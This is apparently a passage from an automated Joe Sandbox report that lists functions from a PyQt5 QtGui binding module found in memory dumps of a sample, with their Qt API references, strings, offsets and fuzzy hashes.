Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?minimumFromLongLong_Size@Size@@Window@@
String ID: QWindow$minimumWidth$minimumWidth(self) -> int
API String ID: 430898146-2091606642
Opcode ID: 330c84295b4ab0bc12ebc684f1068d8838cbf923b43149be572c015c2bef537c
Instruction ID: 1afa59ca8fd1cdad31002483c08a9ea0c52cc8ab0f970b7faecff9193a93b9d3
Opcode Fuzzy Hash: 330c84295b4ab0bc12ebc684f1068d8838cbf923b43149be572c015c2bef537c
Instruction Fuzzy Hash: 60010CB5A18B5AC1EB50CF25E8486A933A8FB95B84FA140B6DA5D03320DF7CE549C740

Function 00007FFB9A325B50 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 31COMMON

Download Yara Rule

APIs

?intProperty@QTextFormat@@QEBAHH@Z.QT5GUI ref: 00007FFB9A325BA0
PyLong_FromLong.PYTHON3 ref: 00007FFB9A325BA8

Strings

QTextBlockFormat, xrefs: 00007FFB9A325BCD
headingLevel(self) -> int, xrefs: 00007FFB9A325BBA
headingLevel, xrefs: 00007FFB9A325BC6

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?intFormat@@FromLongLong_Property@Text
String ID: QTextBlockFormat$headingLevel$headingLevel(self) -> int
API String ID: 1809571791-2915963898
Opcode ID: 9ef99c480ce6dd7319c0b5367f0a62910f3ed89ad803e8426da58bd1a3d40804
Instruction ID: 058487c816aba06320451bf9181fd8b4d78fedc47ec7aaa8376743e6d83a00b1
Opcode Fuzzy Hash: 9ef99c480ce6dd7319c0b5367f0a62910f3ed89ad803e8426da58bd1a3d40804
Instruction Fuzzy Hash: 9A011AB5B08B8AC1EB508F70E8486A937A8FB54B44F9181B6CA4D43320DFBDD659C780

Function 00007FFB9A32DC10 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 31COMMON

Download Yara Rule

APIs

?boolProperty@QTextFormat@@QEBA_NH@Z.QT5GUI ref: 00007FFB9A32DC60
PyBool_FromLong.PYTHON3 ref: 00007FFB9A32DC69

Strings

QTextCharFormat, xrefs: 00007FFB9A32DC8E
fontFixedPitch(self) -> bool, xrefs: 00007FFB9A32DC7B
fontFixedPitch, xrefs: 00007FFB9A32DC87

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?boolBool_Format@@FromLongProperty@Text
String ID: QTextCharFormat$fontFixedPitch$fontFixedPitch(self) -> bool
API String ID: 3344510876-2386052853
Opcode ID: 77e06e29e5b71345a5514b7677db195298e583a11e6fa76bdf397a4ca6cd8c09
Instruction ID: 1a7912fe161d4fcfd3afcf3ad534124a5b20e19d565099fe7d733d239a29fcb3
Opcode Fuzzy Hash: 77e06e29e5b71345a5514b7677db195298e583a11e6fa76bdf397a4ca6cd8c09
Instruction Fuzzy Hash: 98011AB5A08B56C1EB10DF65E8886A937B8FB94784FA180B6CA5D03320CF7DD659C340

Function 00007FFB9A329930 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 31COMMON

Download Yara Rule

APIs

?testOption@QSurfaceFormat@@QEBA_NW4FormatOption@1@@Z.QT5GUI ref: 00007FFB9A329980
PyBool_FromLong.PYTHON3 ref: 00007FFB9A329989

Strings

QSurfaceFormat, xrefs: 00007FFB9A3299AE
stereo, xrefs: 00007FFB9A3299A7
stereo(self) -> bool, xrefs: 00007FFB9A32999B

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?testBool_FormatFormat@@FromLongOption@Option@1@@Surface
String ID: QSurfaceFormat$stereo$stereo(self) -> bool
API String ID: 808278463-1067816198
Opcode ID: 67868ea12c44d5fb7eefa559aff8f5382f33da0c9c83aedb429789250cf652b7
Instruction ID: 5d1f7041b3d5bd11a8f72e5f7217ef432fcace958f447061778b953973401051
Opcode Fuzzy Hash: 67868ea12c44d5fb7eefa559aff8f5382f33da0c9c83aedb429789250cf652b7
Instruction Fuzzy Hash: BC012CB5A08A56C1EB10DF71E8986A933A8FB55744F9140B6CE5D43324CF7DD55AC380

Function 00007FFB9A337EE0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON

Download Yara Rule

APIs

?hasClipping@QPainter@@QEBA_NXZ.QT5GUI ref: 00007FFB9A337F2B
PyBool_FromLong.PYTHON3 ref: 00007FFB9A337F34

Strings

hasClipping, xrefs: 00007FFB9A337F52
QPainter, xrefs: 00007FFB9A337F59
hasClipping(self) -> bool, xrefs: 00007FFB9A337F46

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?hasBool_Clipping@FromLongPainter@@
String ID: QPainter$hasClipping$hasClipping(self) -> bool
API String ID: 2826564307-3272688965
Opcode ID: b8c246f5ced8e92eca641af799bf6dc5e917110774232f18352303897fc077d2
Instruction ID: b66e8a0227888d4377f0db6e185d568f14fda7313f1d69b0fe6cca65db330d95
Opcode Fuzzy Hash: b8c246f5ced8e92eca641af799bf6dc5e917110774232f18352303897fc077d2
Instruction Fuzzy Hash: 9B0128B5A18B5AC1EB10DF31E8986A933A8FB94B44FA140B6CE5D43320CF7CD54AC780

Function 00007FFB9A2FBAB0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON

Download Yara Rule

APIs

?textPosition@QTextInlineObject@@QEBAHXZ.QT5GUI ref: 00007FFB9A2FBAFB
PyLong_FromLong.PYTHON3 ref: 00007FFB9A2FBB03

Strings

textPosition, xrefs: 00007FFB9A2FBB21
QTextInlineObject, xrefs: 00007FFB9A2FBB28
textPosition(self) -> int, xrefs: 00007FFB9A2FBB15

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?textFromInlineLongLong_Object@@Position@Text
String ID: QTextInlineObject$textPosition$textPosition(self) -> int
API String ID: 2776140407-124157796
Opcode ID: 582a172e992d6740ca3455f66f78b8dc35f677873c6d62a3c268a06e81df0ff2
Instruction ID: 8a14971ee63b5b58550217cb2db458bd44e6c57b399e27b0959e776237cd2c04
Opcode Fuzzy Hash: 582a172e992d6740ca3455f66f78b8dc35f677873c6d62a3c268a06e81df0ff2
Instruction Fuzzy Hash: C9011AB5B08B46C1EB109F71E8496A833A8FB94B84F9140B2CA4D43360CF7DD549C380

Function 00007FFB9A32FB10 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON

Download Yara Rule

APIs

?position@QTextFragment@@QEBAHXZ.QT5GUI ref: 00007FFB9A32FB5B
PyLong_FromLong.PYTHON3 ref: 00007FFB9A32FB63

Strings

position, xrefs: 00007FFB9A32FB81
QTextFragment, xrefs: 00007FFB9A32FB88
position(self) -> int, xrefs: 00007FFB9A32FB75

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?position@Fragment@@FromLongLong_Text
String ID: QTextFragment$position$position(self) -> int
API String ID: 1931772406-1207288702
Opcode ID: 92832a60bd70b47134c56bda7089d5ca6572e2a94830b66cdda358218d986089
Instruction ID: 5d0a293239f4be8072873e12a02eb464063fbd03b64f28c8b07f39a209c3bb2a
Opcode Fuzzy Hash: 92832a60bd70b47134c56bda7089d5ca6572e2a94830b66cdda358218d986089
Instruction Fuzzy Hash: 22012CB5B08A46C1EB109F70E8586A833A8FB54B54FA140B2CA5D43320DFBDD959C380

Function 00007FFB9A319EB0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON

Download Yara Rule

APIs

?isNull@QVector4D@@QEBA_NXZ.QT5GUI ref: 00007FFB9A319EFB
PyBool_FromLong.PYTHON3 ref: 00007FFB9A319F04

Strings

isNull(self) -> bool, xrefs: 00007FFB9A319F16
QVector4D, xrefs: 00007FFB9A319F29
isNull, xrefs: 00007FFB9A319F22

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Bool_FromLongNull@Vector4
String ID: QVector4D$isNull$isNull(self) -> bool
API String ID: 3909539051-2332985828
Opcode ID: 3d35bfbdd5869d7e461e215ae19ce0d4a6bcd7502145eb25b12ac24b0aa6682d
Instruction ID: 738967599007ce47fea0e32da33604625a2a0f6d3befbfa9237a62f61812c97e
Opcode Fuzzy Hash: 3d35bfbdd5869d7e461e215ae19ce0d4a6bcd7502145eb25b12ac24b0aa6682d
Instruction Fuzzy Hash: 270128B5B08B46D1EB109F71E8986A837A8FB94B45FA140B2CE5C43320DF7CD59AC380

Function 00007FFB9A329EB0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON

Download Yara Rule

APIs

?weight@QRawFont@@QEBAHXZ.QT5GUI ref: 00007FFB9A329EFB
PyLong_FromLong.PYTHON3 ref: 00007FFB9A329F03

Strings

weight, xrefs: 00007FFB9A329F21
weight(self) -> int, xrefs: 00007FFB9A329F15
QRawFont, xrefs: 00007FFB9A329F28

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?weight@Font@@FromLongLong_
String ID: QRawFont$weight$weight(self) -> int
API String ID: 1495005862-2304509088
Opcode ID: 57d9e1fda54ad3606fb87fd0d9dd8a563fe6de241204256db539e28b588a2d22
Instruction ID: c60222f16540af719764366fbab0ff38f051ed20af8745a5772852f4541aca59
Opcode Fuzzy Hash: 57d9e1fda54ad3606fb87fd0d9dd8a563fe6de241204256db539e28b588a2d22
Instruction Fuzzy Hash: 50011AB5B08B46D1EB509F75E8586A833A8FB94744F9140B2CE4C43320DF7CD949C380

Function 00007FFB9A32FEB0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON

Download Yara Rule

APIs

?length@QTextFragment@@QEBAHXZ.QT5GUI ref: 00007FFB9A32FEFB
PyLong_FromLong.PYTHON3 ref: 00007FFB9A32FF03

Strings

length(self) -> int, xrefs: 00007FFB9A32FF15
QTextFragment, xrefs: 00007FFB9A32FF28
length, xrefs: 00007FFB9A32FF21

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?length@Fragment@@FromLongLong_Text
String ID: QTextFragment$length$length(self) -> int
API String ID: 3894585651-2905367999
